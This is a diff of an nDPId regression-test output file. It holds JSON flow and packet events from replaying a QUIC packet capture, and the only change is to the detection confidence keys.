00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1431155536815} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431155536815,"flow_last_seen":1431155536815,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1431155536815,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.212.101","src_port":57833,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02241{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1431155536815,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1431155536815,"pkt":"ZHACjT05eJKcD6iOCABFAAViHYdAAEARqU7AqAFt2DrUZeHpAbsFTjSmDbLeXfFPVUXrUTAyNAE7bomG+Dzzt6arXQUBoAEABENITE8YAAAAUEFEAIcBAABTTkkAlgEAAFNUSwDQAQAAVkVSANQBAABDQ1MA5AEAAE5PTkMEAgAATVNQQwgCAABBRUFEDAIAAFVBSUQkAgAAU0NJRDQCAABUQ0lEOAIAAFBETUQ8AgAAU1JCRkACAABJQ1NMRAIAAFBVQlNkAgAAU0NMU2gCAABLRVhTbAIAAENPUFRsAgAAQ0NSVIQCAABDR1NUiAIAAElSVFSMAgAAQ0VUVjADAABDRkNXNAMAAFNGQ1c4AwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLW1haWwuZ29vZ2xlLmNvbT0+v6ewgcRvrlDFl4IgCKBtLSXVw73kkvbSDmvcmOf2TBMxulvrGz8yGTFdF5jLNEfrxdDYlT46wVhRMDI0OZ\/5U0D3\/sl7Junn5Fxx\/1VNs1C1kCtxr0CV9UPILNoJ6w2heNOu0THXmZnbqXjfZAAAAEFFU0diZXRhIENocm9tZS80My4wLjIzNTcuNDWSgFuKS9buSt4mHNzF5UW8AAAAAFg1MDkAAAQAHgAAALUiugwS5Xe6lV7+35SrDjhQNi2XDPMM\/SAa6745q60xAQAAAEMyNTWyymQS2aTzwxJH\/U1CkeUIQAt7kKmueetRQklDOGABACXmg4KWna0TB6ed5h20iLVA1zTe0FGDOptzFKaIlVwv9K6LN7uMdA4zwVZIB1iByXkmIDPeaAjR8KDHiEXiLMdlilnNIxXrsf36+nSmAywD99MMia5QSojDYPQnkx\/kpc2+WkgLuTD7x6JugKntVJ0OcgBRa3ZbeaVzbIzXT9DutsK0zdmFTlT7PzF\/1Y0KupYf9uk4kqnlGvQLoUuyyKbFovu6AACgAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431155536815,"flow_last_seen":1431155536815,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1431155536815,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.212.101","src_port":57833,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GMail","breed":"Acceptable","category":"Email"},"quic": {"client_requested_server_name":"mail.google.com","user_agent":"beta Chrome\/43.0.2357.45"}} +00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431155536815,"flow_last_seen":1431155536815,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1431155536815,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.212.101","src_port":57833,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GMail","breed":"Acceptable","category":"Email"},"quic": {"client_requested_server_name":"mail.google.com","user_agent":"beta Chrome\/43.0.2357.45"}} 01029{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1431155536861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":478,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":478,"pkt_l4_len":444,"thread_ts_msec":1431155536861,"pkt":"ZHACjT05eJKcD6iOCABFAAHQHY9AAEARrNjAqAFt2DrUZeHpAbsBvNDyDbLeXfFPVUXrUTAyNAKdxuQD3gljSLhQUOfLRbUHNhGyhVA9b2u4w1RW9E4SCZCpycMJZccQCIwgTfygJ\/6u\/OxyXHQ8t9GsIUVpGN5BSEz\/EaopIjzG0oey+J14dhVaQT5clZ4hX2alMKUnKCpX2UHp8k4gIBE+BTaDbhx4sVltZ3YRbFd1slVBcwxCCDis9hGoXWyhcUU9TpSCvPXqyDIBYGsw8hGUNxjvWcC36dLiKPlQ1A++VHlkjzGxGsfgIrij15t0O6lgXxVbA\/HpW3G2ebAmsKraKCAnkkUtJl3AOI\/J2OljPOJ8ybsb8ihq0NT5yt7I6jw60az5CR6QV4lZS\/t+fQsKeKH0MrEQhH3b6f+BZUKI9uikSR4hfQxA8xYeMMFcn\/fjScjPTaUqPoQqgHKJPMZAaJaOIXR\/06t5\/mWN79wAQ5uIfj\/sSvnF2vA+Wg+Ct+7u2iMK\/1hOAY0\/EO0phnuWYuhnxN7rmjjYiKKpzjb+WYnzCHocgbS6q4u8VmchP8qd2Emms7CkStzYV\/CAUZKEnfSvajU\/RaVfjhz9giNrW3Dr5B1Mu7zIwMFBEg=="} 02261{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1431155536876,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1431155536876,"pkt":"eJKcD6iOZHACjT05CABFAAVi+w8AADYRFcbYOtRlwKgBbQG74ekFTrySAAED7yXOnwe7pFDDfekcKJR3Jy2sqO+OrEMBkrmlA5460PLSsQWLxQP3oiY5d8U9vyThqGCVEM5n\/b30dAd2DjWMikTcCyMma2f07JhYHF3MMGVgNWOe6MGYINMPJ609w8TfRzFDXO2Hv3Rd+Io3\/xrzZn4oPs6zhHI1yq2C3Bu04kRZDHQePoRj30\/8HvjxNKB4JiKyE+zKdMREBQ3JOi\/Z6sOIMbX9akogkYpnl7ng6wuSDWdU0O6S17QqQ\/PZNbWcKj10ybS4iwVQA0f8amB7S9uZIaouXNiBUNnVoBkvwUNJHLfYTkO7Lcrh9\/y6VuU0sUqC5BwPmW+2ikCeMngUD1xHT1Lx5xcuKKpYgNXg5fiz8miFT9HCjdjO6B4AMX2tdmMxafKWE\/OE83wkxbiDjermaqDLFN43iZrsa77dngVKSa0JOoliFCpsBQc+8MPNJciywBt2F7RgKowH2h+9Qk9ORQtDAbuXMpSiJJWSUWGURbG9ZouMcFzy3aCPhH9WEaiDxSqv5bG1C+4++Ap3JmLZGydHT1SxVwfUUCxHryOH1SJLcVb8wYjogx1ZyV2hUKKGb\/LTkrzKQgQmaow0b30+zmXo8EqAqNi+pbkwMCjRuhbpSGWkDycL5nwxuP9Ml3fkw+Nua2MwUp0EfcBQbRU9wNgqxQ9uJseySfgLNd277XFk6kBsEbZHLkwoqVC16i6UXqO9Bq9Qa6OSE4HmTd0ZK\/TJwTkvyZH7HArDOO\/IcXlmUhCYygfBL2Q5ZpNExxrN9hs9fyUTlDAy\/fKVbi1DmTvb8UQ08IKIHR88Yq94i78i11E4Ck+d\/mt1HMNvsgPj2pD+djmLPe2eSTH37Jk2vmFRiqCOpbpsl49D\/VP3D6Iqy69k4ASDn2RRISJtJTG3B4eSG0UcIyl51iCsWhHCXqo+IYYFVP5DZZddk8U1w9uBnJXeOg1TXZTOMI0ol6bS146IgKA69vbLEVfalKBSuGdHvDKyOMSnLak5kQ2gF6fQS9y3naenu5fopH54EXjO3jjfmTVJmGvZC\/P1NiZtWEgaqDhB2DugL5t17Tc3VwmJfqg+3eAVYWabEKtkMdIl3iArLACUUBNCZz1HkomKYV+WYy79+d13Y8v1fzFaFyLLqqM4eyurBPDRG\/+y1oiSpL+pmxwnbgxI3utzVErOYH+5lhn82g\/+Ii+SkdpS0RH4VCbqV\/v0Y4Y5Od4xYJhouL7GcBe5gBVDLL2wvDGN\/2TxDwPjLE+A3+O2Fa4G5F\/+gjnrsB0wdiL\/ilvOHsRXVpnfbw+QbFdGjFQzBh00mHjlv+hyldAVX6DRrmAyZqfHl4R8DYS3AwjxssPWDwDtSUMlQQpikBERZ9MMlFb4xTKRR\/wBi8a8Irtzx\/kIza\/1v2NJPtS13JBH+AEVAHqIKkeVWhalz8eieG0tc75G2spbagtiyakNL\/rq+i0PePLukIW0MDDsvi7O7dn\/0fwGspoErTl6j3PKwj7+sTyyEqAVRQx1M7OB+kmMDRumZ6Ct9DotkVa72qOqLha\/8xxMPobKOFlHa3535yRdBIpdRmga9bEYopLGGzkYHAzAiGpiXAo7oYF9gbpS7a5ciOCtFbOspMqjc6us7YE1Fk9eZR8mOK3nE7WlV4miQCj5Ye\/jSzjCwJgC1JXYSzigmV7HoFUEa9032KRB3TfddhJ9qY+MTGbbTrJ2h+zE2tLE+GlMJ43i68EjkXl4FQgRWpuP1j6L9IzE9WrKG1pRl60aGD77YrqqhZeBKTB3VaLzjU5uW3RnvxwpEMU20qKXXlS1"} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":414,"source":"quic.pcap","alias":"nDPId-test","packets-captured":414,"packets-processed":413,"total-skipped-flows":0,"total-l4-payload-len":237528,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1461850699450} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1461850699450,"flow_last_seen":1461850699450,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1461850699450,"l3_proto":"ip4","src_ip":"10.0.0.4","dst_ip":"10.0.0.3","src_port":40134,"dst_port":6121,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02238{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1461850699450,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1461850699450,"pkt":"OGO7P47K7LHXhMJyCABFAAViImxAAEAR\/xgKAAAECgAAA5zGF+kFThlmCfresOVX5pKgUTAzMwHak8zsp30I9q698IIAoAEUBUNITE8NAAAAUEFEAEwEAABWRVIAUAQAAENDUwBgBAAATVNQQ2QEAABQRE1EaAQAAElDU0xsBAAAQ1RJTXQEAABOT05QlAQAAFNDTFOYBAAAQ1NDVJgEAABDT1BUnAQAAENGQ1egBAAAU0ZDV6QEAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVEwMzN7Junn5Fxx\/wHogWCSkhroZAAAAFg1MDlYAgAASxIiVwAAAADS+1vXZRZzJ1+rqmPJtznpSW1g7BCg2rfC01sXLNMkHQEAAABGSVhEAEAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1461850699450,"flow_last_seen":1461850699450,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1461850699450,"l3_proto":"ip4","src_ip":"10.0.0.4","dst_ip":"10.0.0.3","src_port":40134,"dst_port":6121,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} +00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1461850699450,"flow_last_seen":1461850699450,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1461850699450,"l3_proto":"ip4","src_ip":"10.0.0.4","dst_ip":"10.0.0.3","src_port":40134,"dst_port":6121,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} 02238{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1461850699600,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1461850699600,"pkt":"OGO7P47K7LHXhMJyCABFAAViIotAAEAR\/vkKAAAECgAAA5zGF+kFThlmCfresOVX5pKgUTAzMwKbXvfkbQpZgkUtS3wAoAEUBUNITE8NAAAAUEFEAEwEAABWRVIAUAQAAENDUwBgBAAATVNQQ2QEAABQRE1EaAQAAElDU0xsBAAAQ1RJTXQEAABOT05QlAQAAFNDTFOYBAAAQ1NDVJgEAABDT1BUnAQAAENGQ1egBAAAU0ZDV6QEAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVEwMzN7Junn5Fxx\/wHogWCSkhroZAAAAFg1MDlYAgAASxIiVwAAAADS+1vXZRZzJ1+rqmPJtznpSW1g7BCg2rfC01sXLNMkHQEAAABGSVhEAEAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 02238{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1461850699901,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1461850699901,"pkt":"OGO7P47K7LHXhMJyCABFAAViIsFAAEAR\/sMKAAAECgAAA5zGF+kFThlmCfresOVX5pKgUTAzMwNQcq6EZWnphcq9nqEAoAEUBUNITE8NAAAAUEFEAEwEAABWRVIAUAQAAENDUwBgBAAATVNQQ2QEAABQRE1EaAQAAElDU0xsBAAAQ1RJTXQEAABOT05QlAQAAFNDTFOYBAAAQ1NDVJgEAABDT1BUnAQAAENGQ1egBAAAU0ZDV6QEAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVEwMzN7Junn5Fxx\/wHogWCSkhroZAAAAFg1MDlYAgAASxIiVwAAAADS+1vXZRZzJ1+rqmPJtznpSW1g7BCg2rfC01sXLNMkHQEAAABGSVhEAEAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":413,"flow_first_seen":1431155536815,"flow_last_seen":1431155574747,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":237528,"flow_avg_l4_payload_len":575,"midstream":0,"thread_ts_msec":1461850703450,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.212.101","src_port":57833,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GMail","breed":"Acceptable","category":"Email"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":413,"flow_first_seen":1431155536815,"flow_last_seen":1431155574747,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":237528,"flow_avg_l4_payload_len":575,"midstream":0,"thread_ts_msec":1461850703450,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.212.101","src_port":57833,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GMail","breed":"Acceptable","category":"Email"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","packets-captured":420,"packets-processed":419,"total-skipped-flows":0,"total-l4-payload-len":244348,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1463060980301} 